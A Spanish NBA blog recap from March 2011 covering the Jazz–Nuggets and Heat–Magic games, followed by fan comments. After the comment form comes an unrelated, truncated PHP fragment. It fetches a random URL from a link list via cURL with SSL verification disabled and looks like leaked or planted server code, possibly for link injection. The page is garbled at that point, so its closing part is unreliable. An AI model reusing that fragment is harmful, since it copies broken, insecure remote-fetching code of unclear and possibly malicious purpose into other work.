La Crónica (03/03/2011)

04 de March de 2011 por TheDeerHunter

El reloj se para en el Energy Solutions Arena a 1.2 segundos para el final. Devin Harris acaba de acertar un triple desesperado en respuesta al que un instante antes había anotado Afflalo. Aún así el marcador refleja 2 arriba para Denver y los que en su día fueron los perros de presa de Sloan se disponen a presionar el saque de fondo. Kenyon Martin se coloca para sacar y pide distancia a Kirilenko, su defensor. En ese momento la situación se torna hilarante. En el gesto, a Martin se le escapa el balón de las manos y le cae al ruso debajo del mismísimo aro. Todo indica que va a empatar, la levanta rápidamente y a escasos centímetros de su objetivo… la falla. El resultado es una de las más grandes caras de tonto que uno haya visto en esta liga en la vida (103-101).

En el otro duelo de la noche también hubo máxima emoción y errores capitales. Los Heat se dejaron remontar nada menos que 24 puntos en el tercer cuarto para terminar perdiendo contra los Magic. El debut de Bibby no pudo ser más negativo tanto en lo individual como en lo colectivo. Los Heat empiezan a coger fama de no poder contra sus rivales de conferencia más fuertes… y también de algo incluso más preocupante: de que sufren excesivamente en los partidos apretados. En los últimos minutos y prórrogas de partidos que se resuelven por 5 puntos o menos el porcentaje de lanzamiento y el ratio de asistencias desciende peligrosamente. Los Magic tropezaron con la posibilidad de una victoria que prácticamente se les había escapado, jugaron mejor sus bazas que sus rivales en el momento crítico y se llevaron el gato al agua. Gran resultado e impacto moral para ellos (99-96).

PREMIOS

MVP: Dwight Howard suma y sigue. Otra buena actuación de 14 puntos, 18 rebotes, 5 asistencias y 5 rebotes, coronada con una remontada de 24 puntos. ¿Qué más se puede pedir?

Rookie: ¿Rookies?¿Donde? Tan sólo jugó Gordon Hayward y no estuvo especialmente brillante.

Sorpresa: No tienen mala vista los Nuggets. Veían que tras Chauncey Billups asomaba la calidad de Ty Lawson, y ahora, tras la marcha del primero, le han dado las riendas del equipo. Anoche lideró a los suyos con 23 puntos, 6 rebotes y 5 asistencias.

Decepción: El nivel de Hedo Turkoglu es altamente preocupante. 3 puntos en 31 minutos de juego. Lo necesitarían si quieren optar a algo en los Playoffs.

Esfuerzo en vano: Y un pelín de decepción. Aunque los fríos números de Lebron James (29-4-6) y Dwyane Wade (28-4-5) son realmente buenos, lo cierto es que la segunda parte de ambos fue patética. Entre los 2 consiguieron un 3 de 13…

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Y los Beach Boys se la volvieron a pegar. Me desconcierta el equipo de Miami. En la primera parte todo parecía un paseo para los Heat. LeBron y Wade llevaban nada menos que 47 puntos entre los dos con una serie de tiro realmente espectacular, el resto acompañaba su exhibición en ataque y en defensa controlaban a Howard y los Heat parecían lo que se supone que son, un equipo grande preparado para poder ganar el anillo. Pero llegó el segundo tiempo y todo cambió. Los Magic empezaron a meter triples a porrillo y a los Heat les entró el canguelo y desaparecieron en un acto que ya se ha dado varias veces esta temporada, la más reciente contra los Knicks. Permitieron encajar un 18-0 en el último cuarto que le doy la vuelta definitiva al marcador y en el tramo caliente su ataque se atascó tremendamente. Wade y LeBron no tiraron del carro en los momentos decisivos y su mejor hombre en la recta final aunque parezca imposible fue Dampier. Tras en 18-0 LeBron y Wade llevaban 6 puntos en la segunda parte entre ambos, ¿Estaban repartiendo juego? Pues no sólo 1 asistencia entre los dos. En definitiva otra derrota preocupante para los Heat que tienen record negativo contra equipos por encima del 50% de victorias y increiblemente negativo contra equipos punteros. Veremos si son capaces de cambiar esa forma de jugar los finales de partido porque en playoffs la mayoría de partidos a partir de 2ª ronda serán así

      Citar

  2. Denise dice:
    #2

    Woooooo! pero esto que es, me acuesto cabreado nada más empezar el tercer cuarto con un 69-49 para Miami, tras unos tiros libres de Wade,, y me levanto y veo que los Magic han ganado!!!.
    Vaya festival de triples que se han debido de pegar los Magic en la segunda parte, especialmente Jason Richardson. Y los Heat, menos de 30 puntos en los 22 minutos finales que no ví. !!

    Que afortunado son los Nuggets traspasando a Melo. Si se venía venir que ellos saldrían ganando del trade.

      Citar

  3. MagicJohnson32 dice:
    #3

    Tal vez los Heat deberían empezar a plantearle la posibilidad de darle la bola a Wade en las jugadas decisivas, porque LeBron no las está metiendo y los Heat tienen un balance terrible en los partidos decididos por pocos puntos (5 de 17 en partidos decididos por menos de 5 puntos, creo recordar).

      Citar

  4. Len Bias dice:
    #4

    No sé quien habrá dormido mejor, los jugadores de los Heat o Kirilenko… vaya noche!

      Citar

  5. HeiNeKeN dice:
    #5

    La jugadita de Kirilenko es de traca jajaja, menudo careto se le queda al mozo y Bell por los suelos xD

      Citar

  6. JHC dice:
    #6

    xk no a jugado derrick favors?

      Citar

  7. CAMPO2 dice:
    #7

    Viendo el traspaso de Carmelo, los Cavaliers se tienen que estar dando de cabezazos contra la pared por no haber podido sacar nada por Lebron.

      Citar

  8. Txusma dice:
    #8

    Favors estaba resfriado.

    Supongo que los Cavs siempre creyeron que podrían renovar a Lebron. Por otro lado, sacaron una Trade Exception de 14.5 millones de dólares. Podría haber sido peor y haberse quedado realmente sin nada como les pasó a los Suns con Amare.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>